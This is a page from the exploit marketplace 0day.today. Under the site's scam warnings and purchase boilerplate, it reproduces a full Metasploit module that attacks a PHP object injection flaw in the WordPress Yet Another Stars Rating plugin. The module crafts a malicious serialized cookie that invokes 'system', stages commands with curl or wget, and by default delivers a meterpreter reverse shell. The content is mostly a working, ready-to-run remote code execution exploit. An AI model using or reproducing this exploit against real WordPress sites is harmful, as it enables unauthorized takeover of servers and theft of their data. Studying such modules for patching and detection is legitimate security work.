0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ [email protected] ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WordPress Yet Another Stars Rating PHP Object Injection Exploit
class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress PHP Object Injection in Yet Another Stars Rating plugin < 1.8.7', 'Description' => %q{ This module exploits Wordpress PHP Object Injection in Yet Another Stars Rating plugin < 1.8.7. The vulnerability is exploitable if there is the Wordpress site uses a 'yasr_visitor_votes' shortcode in a page (authenticated or not). This exploit uses the Requests_Utility_FilteredIterator as WP core class to exploit deserialization. The class allows to send an array and a callback in the constructur, and it will be called in every foreach loop. As the vulnerable module uses the unserialized cookie for a foreach loop, it is possible to exploit this behaviour to exploit the vulnerability. Wordpress disable deserialization for Requests_Utility_FilteredIterator in Wordpress >= 5.5.2, so the exploit only works for Wordpress versions < 5.5.2. Tested on: - Wordpress 5.4.1, - Yet Another Stars rating plugin = 1.8.6 - php 5.6 (in php7 you should customize the serialization payload to try the exploitation) }, 'Author' => [ 'Paul Dannewitz', # Vulnerability Discovery 'gx1 <g.per45[at]gmail.com>', # Exploit Developer ], 'Platform' => 'linux', 'Arch' => ARCH_PHP, 'Targets' => [['WordPress', {}]], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', 'CMDSTAGER::FLAVOR' => 'curl' }, 'CmdStagerFlavor' => ['curl', 'wget'], 'References' => [ ['URL', 'https://wpscan.com/vulnerability/9207'], ['URL', 'https://dannewitz.ninja/posts/php-unserialize-object-injection-yet-another-stars-rating-wordpress'], ['URL', 'https://www.cybersecurity-help.cz/vulnerabilities/17273/'], ['URL', 'https://cybersecsi.com/study-php-unserialize-object-injection-in-yet-another-stars-rating-plugin-by-using-docker-security-playground/'] # Exploit development explanation ], 'License' => MSF_LICENSE )) register_options([ OptString.new('PATH_CONTAINING_YASR_SHORTCODE', [true, 'The path containing yasr_visitor_votes shortcode', '/'] ), OptBool.new('REQUIRE_LOGIN', [true, 'If you need login to view tha path containing yasr shortcode', false] ), OptString.new('USERNAME', [false, 'The Wordpress username to authenticate with'] ), OptString.new('PASSWORD', [false, 'The Wordpress username to authenticate with'] ) ]) register_advanced_options([ OptString.new('WritableDir', [true, 'Writable directory to write temporary payload on disk.', '/tmp']) ]) end def yasr_path return datastore['PATH_CONTAINING_YASR_SHORTCODE'] end def cmdstager_path @cmdstager_path ||= "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}" end def username return datastore['USERNAME'] end def password return datastore['PASSWORD'] end def require_login return datastore['REQUIRE_LOGIN'] end def check if not wordpress_and_online? print_error("#{target_uri} does not seem to be WordPress site") return end version = wordpress_version if not version.nil? print_status("#{target_uri} - WordPress Version #{version} detected") if version if Gem::Version.new(version) >= Gem::Version.new("5.5.2") print_bad("Version higher or equal to 5.5.2") return CheckCode::Safe end return check_plugin_version_from_readme('yet-another-stars-rating', '1.8.7') end return CheckCode::Unknown end def serialized_payload(p) return "C%3A33%3A%22Requests_Utility_FilteredIterator%22%3A#{p.length + 63 + p.length.digits.length }%3A%7Bx%3Ai%3A0%3Ba%3A1%3A%7Bi%3A0%3Bs%3A#{p.length}%3A%22#{URI.encode_www_form_component(p)}%22%3B%7D%3Bm%3Aa%3A1%3A%7Bs%3A11%3A%22%00%2A%00callback%22%3Bs%3A6%3A%22system%22%3B%7D%7D" end def exploit fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online? if require_login print_status("Authentication required, try to login") cookie = wordpress_login(username, password) if cookie print_status("Login successed") else fail_with('Authentication failed', "Unable to login") end else # No login: empty cookie cookie = "" end print_status("Run exploit") print_status("Generating #{datastore['CMDSTAGER::FLAVOR']} command stager") @cmdstager = generate_cmdstager( temp: datastore['WritableDir'], file: File.basename(cmdstager_path) ).join(';') register_file_for_cleanup(cmdstager_path) sp = serialized_payload(@cmdstager) print_status("Send serialized payload: #{sp}") cookie = "#{cookie} yasr_visitor_vote_cookie=#{sp}" res = send_request_cgi({ 'method' => 'GET', 'uri' => yasr_path, 'cookie' => cookie}, 1) end end # 0day.today [2024-05-13] #